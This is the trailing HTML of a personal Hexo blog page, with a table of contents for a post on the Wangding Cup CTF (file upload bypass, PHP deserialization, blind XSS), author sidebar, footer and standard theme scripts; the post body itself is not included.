          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%BD%91%E9%BC%8E%E6%9D%AF%E6%AF%94%E8%B5%9B%E6%84%9F%E6%83%B3"><span class="nav-text">网鼎杯比赛感想</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web"><span class="nav-text">web</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%BB%95%E8%BF%87%E4%B8%80%E5%A0%86%E9%99%90%E5%88%B6%E8%BF%9B%E8%A1%8C%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0"><span class="nav-text">绕过一堆限制进行文件上传</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96"><span class="nav-text">php反序列化</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#xss%E7%9B%B2%E6%89%93%E5%92%8C%E6%9C%AC%E5%9C%B0%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0"><span class="nav-text">xss盲打和本地请求伪造</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%BB%93%E6%9D%9F%E8%AF%AD"><span class="nav-text">结束语</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Geez"
      src="/images/avatar.gif">
  <p class="site-author-name" itemprop="name">Geez</p>
  <div class="site-description" itemprop="description">黑客,诗人,养龟仔</div>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/geeeez/" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;geeeez&#x2F;" rel="noopener" target="_blank"><i class="fa fa-fw fa-fab fa-github"></i></a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 2016 – 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-fas fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Geez</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    <span title="站点总字数">150k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">2:16</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/pjax/pjax.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>
  <script src="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/lozad@1/dist/lozad.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/pangu@4/dist/browser/pangu.min.js"></script>

<script src="/js/utils.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>

  <script>
var pjax = new Pjax({
  selectors: [
    'head title',
    '#page-configurations',
    '.content-wrap',
    '.post-toc-wrap',
    '.languages',
    '#pjax'
  ],
  switches: {
    '.post-toc-wrap': Pjax.switches.innerHTML
  },
  analytics: false,
  cacheBust: false,
  scrollTo : !CONFIG.bookmark.enable
});

window.addEventListener('pjax:success', () => {
  document.querySelectorAll('script[data-pjax], script#page-configurations, #pjax script').forEach(element => {
    var code = element.text || element.textContent || element.innerHTML || '';
    var parent = element.parentNode;
    parent.removeChild(element);
    var script = document.createElement('script');
    if (element.id) {
      script.id = element.id;
    }
    if (element.className) {
      script.className = element.className;
    }
    if (element.type) {
      script.type = element.type;
    }
    if (element.src) {
      script.src = element.src;
      // Force synchronous loading of peripheral JS.
      script.async = false;
    }
    if (element.dataset.pjax !== undefined) {
      script.dataset.pjax = '';
    }
    if (code !== '') {
      script.appendChild(document.createTextNode(code));
    }
    parent.appendChild(script);
  });
  NexT.boot.refresh();
  // Define Motion Sequence & Bootstrap Motion.
  if (CONFIG.motion.enable) {
    NexT.motion.integrator
      .init()
      .add(NexT.motion.middleWares.subMenu)
      .add(NexT.motion.middleWares.postList)
      .bootstrap();
  }
  NexT.utils.updateSidebarPosition();
});
</script>




  




  
<script src="/js/local-search.js"></script>













    <div id="pjax">
  

  

  

    </div>
</body>
</html>
